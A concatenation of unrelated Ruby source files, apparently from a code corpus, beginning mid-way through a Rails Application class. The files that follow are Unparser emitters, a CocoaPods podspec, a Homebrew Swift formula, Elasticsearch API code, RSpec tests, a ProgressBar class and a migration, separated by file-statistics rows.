# Shorthand to decrypt any encrypted configurations or files.
#
# For any file added with <tt>bin/rails encrypted:edit</tt> call +read+ to decrypt
# the file with the master key.
# The master key is either stored in +config/master.key+ or <tt>ENV["RAILS_MASTER_KEY"]</tt>.
#
# Rails.application.encrypted("config/mystery_man.txt.enc").read
# # => "We've met before, haven't we?"
#
# It's also possible to interpret encrypted YAML files with +config+.
#
# Rails.application.encrypted("config/credentials.yml.enc").config
# # => { next_guys_line: "I don't think so. Where was it you think we met?" }
#
# Any top-level configs are also accessible directly on the return value:
#
# Rails.application.encrypted("config/credentials.yml.enc").next_guys_line
# # => "I don't think so. Where was it you think we met?"
#
# The files or configs can also be encrypted with a custom key. To decrypt with
# a key in the +ENV+, use:
#
# Rails.application.encrypted("config/special_tokens.yml.enc", env_key: "SPECIAL_TOKENS")
#
# Or to decrypt with a file, that should be version control ignored, relative to +Rails.root+:
#
# Rails.application.encrypted("config/special_tokens.yml.enc", key_path: "config/special_tokens.key")
def encrypted(path, key_path: "config/master.key", env_key: "RAILS_MASTER_KEY")
ActiveSupport::EncryptedConfiguration.new(
config_path: Rails.root.join(path),
key_path: Rails.root.join(key_path),
env_key: env_key,
raise_if_missing_key: config.require_master_key
)
end
def to_app #:nodoc:
self
end
def helpers_paths #:nodoc:
config.helpers_paths
end
console do
require "pp"
end
console do
unless ::Kernel.private_method_defined?(:y)
require "psych/y"
end
end
# Return an array of railties respecting the order they're loaded
# and the order specified by the +railties_order+ config.
#
# While running initializers we need engines in reverse order here when
# copying migrations from railties ; we need them in the order given by
# +railties_order+.
def migration_railties # :nodoc:
ordered_railties.flatten - [self]
end
protected
alias :build_middleware_stack :app
def run_tasks_blocks(app) #:nodoc:
railties.each { |r| r.run_tasks_blocks(app) }
super
require "rails/tasks"
task :environment do
ActiveSupport.on_load(:before_initialize) { config.eager_load = false }
require_environment!
end
end
def run_generators_blocks(app) #:nodoc:
railties.each { |r| r.run_generators_blocks(app) }
super
end
def run_runner_blocks(app) #:nodoc:
railties.each { |r| r.run_runner_blocks(app) }
super
end
def run_console_blocks(app) #:nodoc:
railties.each { |r| r.run_console_blocks(app) }
super
end
# Returns the ordered railties for this application considering railties_order.
def ordered_railties #:nodoc:
@ordered_railties ||= begin
order = config.railties_order.map do |railtie|
if railtie == :main_app
self
elsif railtie.respond_to?(:instance)
railtie.instance
else
railtie
end
end
all = (railties - order)
all.push(self) unless (all + order).include?(self)
order.push(:all) unless order.include?(:all)
index = order.index(:all)
order[index] = all
order
end
end
def railties_initializers(current) #:nodoc:
initializers = []
ordered_railties.reverse.flatten.each do |r|
if r == self
initializers += current
else
initializers += r.initializers
end
end
initializers
end
def default_middleware_stack #:nodoc:
default_stack = DefaultMiddlewareStack.new(self, config, paths)
default_stack.build_stack
end
def validate_secret_key_base(secret_key_base)
if secret_key_base.is_a?(String) && secret_key_base.present?
secret_key_base
elsif secret_key_base
raise ArgumentError, "`secret_key_base` for #{Rails.env} environment must be a type of String`"
elsif secrets.secret_token.blank?
raise ArgumentError, "Missing `secret_key_base` for '#{Rails.env}' environment, set this string with `rails credentials:edit`"
end
end
private
def generate_development_secret
if secrets.secret_key_base.nil?
key_file = Rails.root.join("tmp/development_secret.txt")
if !File.exist?(key_file)
random_key = SecureRandom.hex(64)
FileUtils.mkdir_p(key_file.dirname)
File.binwrite(key_file, random_key)
end
secrets.secret_key_base = File.binread(key_file)
end
secrets.secret_key_base
end
def build_request(env)
req = super
env["ORIGINAL_FULLPATH"] = req.fullpath
env["ORIGINAL_SCRIPT_NAME"] = req.script_name
req
end
def build_middleware
config.app_middleware + super
end
end
end
| 36.563813 | 157 | 0.682278 |
260af9be0fdfeb778529bee0d402617347ada583 | 4,906 | # frozen_string_literal: true
module Unparser
class Emitter
# Arg expr (pattern args) emitter
class ArgExpr < self
handle :arg_expr
children :body
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
visit_parentheses(body)
end
end # ArgExpr
# Arguments emitter
class Arguments < self
include Terminated
handle :args
SHADOWARGS = ->(node) { node.type.equal?(:shadowarg) }.freeze
ARG = ->(node) { node.type.equal?(:arg) }.freeze
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
delimited(normal_arguments)
write(', ') if procarg_disambiguator?
return if shadowargs.empty?
write('; ')
delimited(shadowargs)
end
# Test for procarg_disambiguator
#
# @return [Boolean]
#
# @api private
#
def procarg_disambiguator?
regular_block? && normal_arguments.all?(&ARG) && normal_arguments.one?
end
# Test for regular block
#
# @return [Boolean]
#
# @api private
#
def regular_block?
parent_type.equal?(:block) && !parent.node.children.first.type.equal?(:lambda)
end
# Return normal arguments
#
# @return [Enumerable<Parser::AST::Node>]
#
# @api private
#
def normal_arguments
children.reject(&SHADOWARGS)
end
memoize :normal_arguments
# Return shadow args
#
# @return [Enumerable<Parser::AST::Node>]
#
# @api private
#
def shadowargs
children.select(&SHADOWARGS)
end
memoize :shadowargs
end # Arguments
# Emitter for block and kwrestarg arguments
class Morearg < self
include Terminated
MAP = {
blockarg: T_AMP,
kwrestarg: T_DSPLAT
}.freeze
handle :blockarg
handle :kwrestarg
children :name
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
write(MAP.fetch(node_type), name.to_s)
end
end # Blockarg
# Optional argument emitter
class Optarg < self
include Terminated
handle :optarg
children :name, :value
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
write(name.to_s, WS, T_ASN, WS)
visit(value)
end
end
# Optional keyword argument emitter
class KeywordOptional < self
include Terminated
handle :kwoptarg
children :name, :value
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
write(name.to_s, T_COLON, WS)
visit(value)
end
end # KeywordOptional
# Keyword argument emitter
class Kwarg < self
include Terminated
handle :kwarg
children :name
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
write(name.to_s, T_COLON)
end
end # Restarg
# Rest argument emitter
class Restarg < self
include Terminated
handle :restarg
children :name
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
write(T_SPLAT, name.to_s)
end
end # Restarg
# Argument emitter
class Argument < self
include Terminated
handle :arg, :shadowarg
children :name
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
write(name.to_s)
end
end # Argument
# Progarg emitter
class Procarg < self
include Terminated
handle :procarg0
PARENS = %i[restarg mlhs].freeze
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
if needs_parens?
parentheses do
delimited(children)
end
else
delimited(children)
end
end
def needs_parens?
children.length > 1 || children.any? do |node|
PARENS.include?(node.type)
end
end
end
# Block pass node emitter
class BlockPass < self
include Terminated
handle :block_pass
children :name
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
write(T_AMP)
visit(name)
end
end # BlockPass
end # Emitter
end # Unparser
| 16.630508 | 86 | 0.53832 |
01736ef09d5eb1706514c174ca6b2e0c349dc3ef | 1,653 | Pod::Spec.new do |spec|
spec.name = "UnityMediationSdk"
spec.version = '0.2.1'
spec.summary = "Unity Mediation SDK"
spec.description = "UnityMediationSdk Framework containing protobuf objc files for communicating with the instantiation service."
spec.homepage = "https://github.com/Unity-Technologies/mz-mediation-sdk-ios"
spec.license = { :type => 'Unity Monetization Services', :text => <<-LICENSE
Unity Monetization copyright © 2020 Unity Technologies SF
Your use of the Unity Technologies SF ("Unity') services known as "Unity Monetization" are subject to the Unity Monetization Services Terms of Service linked to and copied immediately below.
[Unity Monetization Services TOS](https://unity3d.com/legal/monetization-services-terms-of-service)
Your use of Unity Monetization constitutes your acceptance of such terms. Unless expressly provided otherwise, the software under this license is made available strictly on an "AS IS" BASIS WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED. Please review the license for details on these and other terms and conditions.
LICENSE
}
spec.author = { "Shawn Hampton" => "[email protected]" }
spec.platform = :ios, "9.0"
spec.source = { :http => "https://unity3ddist.jfrog.io/artifactory/unity-mediation-generic-prod-local/UnityMediationSdk/0.2.1/UnityMediationSdk.xcframework.zip" }
spec.vendored_frameworks = "UnityMediationSdk.xcframework"
spec.frameworks = "SystemConfiguration", "AppTrackingTransparency", "AdSupport", "WebKit"
spec.dependency "Protobuf", "~> 3.12.0"
end
| 71.869565 | 320 | 0.722928 |
1df50ef2b52f515c301031c3e1c3ba6d0d4da9c2 | 878 | require 'rails_helper'
RSpec.describe "books/show", type: :view do
before(:each) do
@book = assign(:book, Book.create!(
title: "Title",
description: "MyText",
edition: 2,
pages: 3,
format: "Format",
price: 4,
quantity: 5,
available: false,
author: nil,
category: nil,
publisher: nil,
user: nil
))
end
it "renders attributes in <p>" do
render
expect(rendered).to match(/Title/)
expect(rendered).to match(/MyText/)
expect(rendered).to match(/2/)
expect(rendered).to match(/3/)
expect(rendered).to match(/Format/)
expect(rendered).to match(/4/)
expect(rendered).to match(/5/)
expect(rendered).to match(/false/)
expect(rendered).to match(//)
expect(rendered).to match(//)
expect(rendered).to match(//)
expect(rendered).to match(//)
end
end
| 23.72973 | 43 | 0.59795 |
e28a8abc3da8b25eb0919e55aceb94817460ffff | 389 | class Invitation < ApplicationRecord
include Invitations::Core
# 🚅 add concerns above.
# 🚅 add belongs_to associations above.
# 🚅 add has_many associations above.
# 🚅 add oauth providers above.
# 🚅 add has_one associations above.
# 🚅 add scopes above.
# 🚅 add validations above.
# 🚅 add callbacks above.
# 🚅 add delegations above.
# 🚅 add methods above.
end
| 16.913043 | 40 | 0.678663 |
28d7f806a27e70a03e85a0fac630813724d96df9 | 3,526 | class Swift < Formula
desc "High-performance system programming language"
homepage "https://github.com/apple/swift"
url "https://github.com/apple/swift/archive/swift-2.2-SNAPSHOT-2015-12-18-a.tar.gz"
version "2.2-SNAPSHOT-2015-12-18-a"
sha256 "2ff6c780f1768e410e444915d6830048025a7f353c9a4bc30456bbd40ad33951"
stable do
swift_tag = "swift-#{version}"
resource "cmark" do
url "https://github.com/apple/swift-cmark/archive/0.22.0.tar.gz"
sha256 "7fa11223b9a29a411fbc440aba2a756ccc8b6228d8c2b367e8f568968e3eb569"
end
resource "clang" do
url "https://github.com/apple/swift-clang/archive/#{swift_tag}.tar.gz"
sha256 "a626feb26119cde3f9df15549d8a53028c704c5deba5e84b60ba434398a529da"
end
resource "llvm" do
url "https://github.com/apple/swift-llvm/archive/#{swift_tag}.tar.gz"
sha256 "6d69cd1ea9bb830bc7f21a80c30d5be29e55878b9f9f46ef4faa2fd02d36b160"
end
end
bottle do
sha256 "d6702f2d52b0f570c3851e88605529e3102df8b3bf243d8c8db0cbe18b63d027" => :el_capitan
sha256 "6d5ed861ec71459e6671a534f52e0e449e9025bdad1a6faab6dc3bc843aa4af8" => :yosemite
end
head do
url "https://github.com/apple/swift"
resource "cmark" do
url "https://github.com/apple/swift-cmark.git"
end
resource "clang" do
url "https://github.com/apple/swift-clang.git", :branch => "stable"
end
resource "llvm" do
url "https://github.com/apple/swift-llvm.git", :branch => "stable"
end
end
keg_only :provided_by_osx, "Apple's CLT package contains Swift."
depends_on "cmake" => :build
depends_on "ninja" => :build
depends_on :xcode => ["7.0", :build]
def install
workspace = buildpath.parent
build = workspace/"build"
ln_sf buildpath, "#{workspace}/swift"
resources.each { |r| r.stage("#{workspace}/#{r.name}") }
mkdir build do
system "#{buildpath}/utils/build-script-impl",
"--build-dir=#{build}",
"--cmark-build-type=Release",
"--llvm-build-type=Release",
"--swift-build-type=Release",
"--swift-stdlib-build-type=Release",
"--lldb-build-type=Release",
"--llvm-enable-assertions=false",
"--swift-enable-assertions=false",
"--swift-stdlib-enable-assertions=false",
"--cmake-generator=Ninja",
"--workspace=#{workspace}",
"--skip-test-cmark",
"--skip-test-lldb",
"--skip-test-swift",
"--skip-test-llbuild",
"--skip-test-swiftpm",
"--skip-test-xctest",
"--skip-test-foundation",
"--skip-test-validation",
"--skip-test-optimized",
"--skip-build-lldb",
"--skip-build-llbuild",
"--skip-build-swiftpm",
"--skip-build-xctest",
"--skip-build-foundation",
"--build-args=-j#{ENV.make_jobs}",
"--lldb-use-system-debugserver",
"--install-prefix=#{prefix}",
"--skip-ios",
"--skip-tvos",
"--skip-watchos",
"--darwin-deployment-version-osx=#{MacOS.version}",
"--build-jobs=#{ENV.make_jobs}"
end
bin.install "#{build}/swift-macosx-x86_64/bin/swift",
"#{build}/swift-macosx-x86_64/bin/swiftc"
(lib/"swift").install "#{build}/swift-macosx-x86_64/lib/swift/macosx/",
"#{build}/swift-macosx-x86_64/lib/swift/shims/"
end
test do
(testpath/"test.swift").write 'print("test")'
system "#{bin}/swiftc", "test.swift"
assert_equal "test\n", shell_output("./test")
end
end
| 32.348624 | 92 | 0.632728 |
e9a6ab006abb8d3efd8cc583cba933bc27615440 | 270 | class ParticipantSerializer < ActiveModel::Serializer
attributes :id, :email, :first_name, :last_name, :status
has_many :case_notes
has_many :paperworks
has_many :studio_assessments
has_one :personal_questionnaire
has_one :professional_questionnaire
end
| 20.769231 | 58 | 0.8 |
f7ee39a17555e896ddaba6b8a9eed215507acb23 | 214 | class AddDefaultValueToIsActive < ActiveRecord::Migration
def up
change_column :users, :is_active, :boolean, :default => true
end
def down
change_column :users, :is_active, :boolean, :default => nil
end
end
| 21.4 | 62 | 0.752336 |
6a20fdb441a02c7306fee306542e96c0443a4592 | 2,665 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Elasticsearch
module API
module Nodes
module Actions
# Returns low-level information about REST actions usage on nodes.
#
# @option arguments [List] :node_id A comma-separated list of node IDs or names to limit the returned information; use `_local` to return information from the node you're connecting to, leave empty to get information from all nodes
# @option arguments [List] :metric Limit the information returned to the specified metrics (options: _all, rest_actions)
# @option arguments [Time] :timeout Explicit operation timeout
# @option arguments [Hash] :headers Custom HTTP headers
#
# @see https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-nodes-usage.html
#
def usage(arguments = {})
headers = arguments.delete(:headers) || {}
arguments = arguments.clone
_node_id = arguments.delete(:node_id)
_metric = arguments.delete(:metric)
method = Elasticsearch::API::HTTP_GET
path = if _node_id && _metric
"_nodes/#{Utils.__listify(_node_id)}/usage/#{Utils.__listify(_metric)}"
elsif _node_id
"_nodes/#{Utils.__listify(_node_id)}/usage"
elsif _metric
"_nodes/usage/#{Utils.__listify(_metric)}"
else
"_nodes/usage"
end
params = Utils.__validate_and_extract_params arguments, ParamsRegistry.get(__method__)
body = nil
perform_request(method, path, params, body, headers).body
end
# Register this action with its valid params when the module is loaded.
#
# @since 6.2.0
ParamsRegistry.register(:usage, [
:timeout
].freeze)
end
end
end
end
| 40.378788 | 239 | 0.654784 |
b94a22bf81edceb9ebec27da8454e25570fb84ac | 5,805 | RSpec.describe ContaAzulApi::Sale do
before do
stub_request(:post, %r{https://api.contaazul.com/oauth2/token}).
to_return(status: 200, body: File.read('spec/fixtures/refresh_oauth_token.json'))
stub_const('CaAuthHistory', FakeCaAuthHistory)
logger = double(:logger, info: '')
allow(Rails).to receive(:logger).and_return(logger)
end
describe '.find' do
it 'returns a sale based on provided id' do
stub_request(:get, "https://api.contaazul.com/v1/sales/c7288c09-829d-48b9-aee2-4f744e380587").
to_return(status: 200, body: File.read('spec/fixtures/sales_endpoints/find_by_id.json'))
sale = ContaAzulApi::Sale.find('c7288c09-829d-48b9-aee2-4f744e380587')
expect(sale.id).to eq('c7288c09-829d-48b9-aee2-4f744e380587')
expect(sale.number).to eq(12)
expect(sale.total).to eq(50)
end
it 'raises an error when sale is not found' do
stub_request(:get, "https://api.contaazul.com/v1/sales/c7288c09-829d-48b9-aee2-4f744e380587").
to_return(status: 404, body: 'Sale not found with the specified id')
expect {
ContaAzulApi::Sale.find('c7288c09-829d-48b9-aee2-4f744e380587')
}.to raise_exception(ContaAzulApi::Sale::NotFound)
end
end
describe '.filter_by' do
it 'returns sales based on provided filters' do
stub_request(:get, "https://api.contaazul.com/v1/sales?emission_start=2020-10-13&size=1").
to_return(status: 200, body: File.read('spec/fixtures/sales_endpoints/filter_by.json'))
sales = ContaAzulApi::Sale.filter_by(emission_start: '2020-10-13', size: 1)
expect(sales).to be_an(Array)
expect(sales.length).to eq 1
sale = sales.first
expect(sale.id).to eq('c7288c09-829d-48b9-aee2-4f744e380587')
expect(sale.number).to eq(12)
expect(sale.total).to eq(50)
end
it 'raises an error when sale is not found' do
stub_request(:get, "https://api.contaazul.com/v1/sales?emission_start=2020-10-13&size=1").
to_return(status: 404, body: 'Sales not found with the specified filters')
expect {
ContaAzulApi::Sale.filter_by(emission_start: '2020-10-13', size: 1)
}.to raise_exception(ContaAzulApi::Sale::NotFound)
end
end
describe 'list_items' do
it 'returns items from a sale' do
stub_request(:get, 'https://api.contaazul.com/v1/sales/c7288c09-829d-48b9-aee2-4f744e380587/items').
to_return(status: 200, body: File.read('spec/fixtures/sales_endpoints/list_items.json'))
items = ContaAzulApi::Sale.list_items('c7288c09-829d-48b9-aee2-4f744e380587')
expect(items.size).to eq(1)
expect(items.first['description']).to eq('Game Atari ET')
expect(items.first['value']).to eq(0)
end
it 'raises an error when sale is not found' do
stub_request(:get, 'https://api.contaazul.com/v1/sales/c7288c09-829d-48b9-aee2-4f744e380587/items').
to_return(status: 404, body: File.read('spec/fixtures/sales_endpoints/list_items.json'))
expect {
ContaAzulApi::Sale.list_items('c7288c09-829d-48b9-aee2-4f744e380587')
}.to raise_exception(ContaAzulApi::Sale::NotFound)
end
end
describe '.create' do
it 'creates a sale when valid data is provided' do
sales_params = {
number: 1234,
emission: '2019-12-27T16:55:06.343Z',
status: 'COMMITTED',
customer_id: 'c7288c09-829d-48b9-aee2-4f744e380587',
products: [
{
description: "Game Atari ET",
quantity: 2,
product_id: "f8ffb77a-3d52-42d7-9bec-ea38c0ef043d",
value: 50
}
],
payment: {
type: 'CASH'
},
notes: 'PP2'
}
ContaAzulApi::Helpers.stub_create_sale(
payload: sales_params,
body: JSON.parse(File.read('spec/fixtures/sales_endpoints/create.json'))
)
new_sale = ContaAzulApi::Sale.create(sales_params.as_json)
expect(new_sale.id).to eq('c7288c09-829d-48b9-aee2-4f744e380587')
end
it 'raises error when sale is not created' do
ContaAzulApi::Helpers.stub_create_sale(status: 422)
expect {
ContaAzulApi::Sale.create({}.as_json)
}.to raise_exception(ContaAzulApi::Sale::NotCreated)
end
end
describe '.delete' do
it 'removes a sale based on provided id' do
stub_request(:delete, "https://api.contaazul.com/v1/sales/c7288c09-829d-48b9-aee2-4f744e380587").
to_return(status: 204, body: 'Sale deleted')
sale_removed = ContaAzulApi::Sale.delete(id: 'c7288c09-829d-48b9-aee2-4f744e380587')
expect(sale_removed).to be_truthy
end
it 'does not remove a sale when they are not found' do
stub_request(:delete, "https://api.contaazul.com/v1/sales/c7288c09-829d-48b9-aee2-4f744e380587").
to_return(status: 404, body: 'Sale not found with specified id')
sale_removed = ContaAzulApi::Sale.delete(id: 'c7288c09-829d-48b9-aee2-4f744e380587')
expect(sale_removed).to be_falsey
end
end
describe '.delete!' do
it 'removes a sale based on provided id' do
stub_request(:delete, "https://api.contaazul.com/v1/sales/c7288c09-829d-48b9-aee2-4f744e380587").
to_return(status: 204, body: 'Sale deleted')
sale_removed = ContaAzulApi::Sale.delete!(id: 'c7288c09-829d-48b9-aee2-4f744e380587')
expect(sale_removed).to be_truthy
end
it 'raises an error when sale is not found' do
stub_request(:delete, "https://api.contaazul.com/v1/sales/c7288c09-829d-48b9-aee2-4f744e380587").
to_return(status: 404, body: 'Sale not found with specified id')
expect {
ContaAzulApi::Sale.delete!(id: 'c7288c09-829d-48b9-aee2-4f744e380587')
}.to raise_exception(ContaAzulApi::Sale::NotDeleted)
end
end
end
| 35.833333 | 106 | 0.671662 |
ab73699a44cacf4efb50b31685cb6943d517bb1f | 162 | # frozen_string_literal: true
require "workbook/cell"
module Workbook
module Types
class Numeric < Numeric
include Workbook::Cell
end
end
end
| 13.5 | 29 | 0.716049 |
0353ae9db7927ece1418bfc10117127828554d14 | 245 | working_directory "/home/root/furtively/current"
pid "/home/root/furtively/shared/pids/unicorn.pid"
stderr_path "/home/root/furtively/shared/log/unicorn.log"
stdout_path "/home/root/furtively/shared/log/unicorn.log"
worker_processes 2
timeout 30 | 40.833333 | 57 | 0.820408 |
4a749293a2114644222e554e7581bdbed394b841 | 497 | cask 'iexplorer' do
version '3.9.8.0'
sha256 '93a9a6e9ba083dcffc22c8f02aa17576d456a6cccce2a423f6c41497bdd9135f'
url "https://www.macroplant.com/release/iExplorer-#{version}.dmg"
appcast 'https://www.macroplant.com/iexplorer/ie3-appcast.xml',
checkpoint: '5681a4d7b14edacfc86a43ad3929b4b798e6ecc30db80f7f58e40bac0746ec65'
name 'iExplorer'
homepage 'https://www.macroplant.com/iexplorer/'
license :freemium
depends_on macos: '>= :snow_leopard'
app 'iExplorer.app'
end
| 31.0625 | 88 | 0.7666 |
26f557057ad524d7af98c918029603379d1a6ec9 | 2,360 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/classes', __FILE__)
describe "Array#hash" do
it "returns the same fixnum for arrays with the same content" do
[].respond_to?(:hash).should == true
[[], [1, 2, 3]].each do |ary|
ary.hash.should == ary.dup.hash
ary.hash.should be_an_instance_of(Fixnum)
end
end
it "properly handles recursive arrays" do
empty = ArraySpecs.empty_recursive_array
empty.hash.should be_kind_of(Fixnum)
array = ArraySpecs.recursive_array
array.hash.should be_kind_of(Fixnum)
end
it "returns the same hash for equal recursive arrays" do
rec = []; rec << rec
rec.hash.should == [rec].hash
rec.hash.should == [[rec]].hash
# This is because rec.eql?([[rec]])
# Remember that if two objects are eql?
# then the need to have the same hash
# Check the Array#eql? specs!
end
it "returns the same hash for equal recursive arrays through hashes" do
h = {} ; rec = [h] ; h[:x] = rec
rec.hash.should == [h].hash
rec.hash.should == [{:x => rec}].hash
# Like above, this is because rec.eql?([{:x => rec}])
end
# Too much of an implementation detail? -rue
not_compliant_on :rubinius, :opal do
it "calls to_int on result of calling hash on each element" do
ary = Array.new(5) do
# Can't use should_receive here because it calls hash()
obj = mock('0')
def obj.hash()
def self.to_int() freeze; 0 end
return self
end
obj
end
ary.hash
ary.each { |obj| obj.frozen?.should == true }
hash = mock('1')
hash.should_receive(:to_int).and_return(1.hash)
obj = mock('@hash')
obj.instance_variable_set(:@hash, hash)
def obj.hash() @hash end
[obj].hash.should == [1].hash
end
end
it "ignores array class differences" do
ArraySpecs::MyArray[].hash.should == [].hash
ArraySpecs::MyArray[1, 2].hash.should == [1, 2].hash
end
it "returns same hash code for arrays with the same content" do
a = [1, 2, 3, 4]
a.fill 'a', 0..3
b = %w|a a a a|
a.hash.should == b.hash
end
it "returns the same value if arrays are #eql?" do
a = [1, 2, 3, 4]
a.fill 'a', 0..3
b = %w|a a a a|
a.hash.should == b.hash
a.should eql(b)
end
end
| 27.44186 | 73 | 0.609322 |
0392832b5eadd3d0c92c9c2c8983ea357e64ae7a | 788 | class ProgressBar
module Format
class String < ::String
MOLECULE_PATTERN = /%[a-zA-Z]/
ANSI_SGR_PATTERN = /\e\[[\d;]+m/
def displayable_length
gsub(ANSI_SGR_PATTERN, '').length
end
def bar_molecule_placeholder_length
@bar_molecule_placeholder_length ||= bar_molecules.size * 2
end
def non_bar_molecules
@non_bar_molecules ||= molecules.select(&:non_bar_molecule?)
end
def bar_molecules
@bar_molecules ||= molecules.select(&:bar_molecule?)
end
def molecules
@molecules ||= begin
molecules = []
scan(MOLECULE_PATTERN) do |match|
molecules << Molecule.new(match[1, 1])
end
molecules
end
end
end
end
end
| 21.297297 | 64 | 0.591371 |
acbb1b5f9244c0dd4a7eef848c2bf5db18b31b64 | 164 | class AddIndexUniqueToUsageLimitsAgain < ActiveRecord::Migration
def change
add_index(:usage_limits, [:metric_id, :plan_id, :period], unique: true)
end
end
| 27.333333 | 75 | 0.768293 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.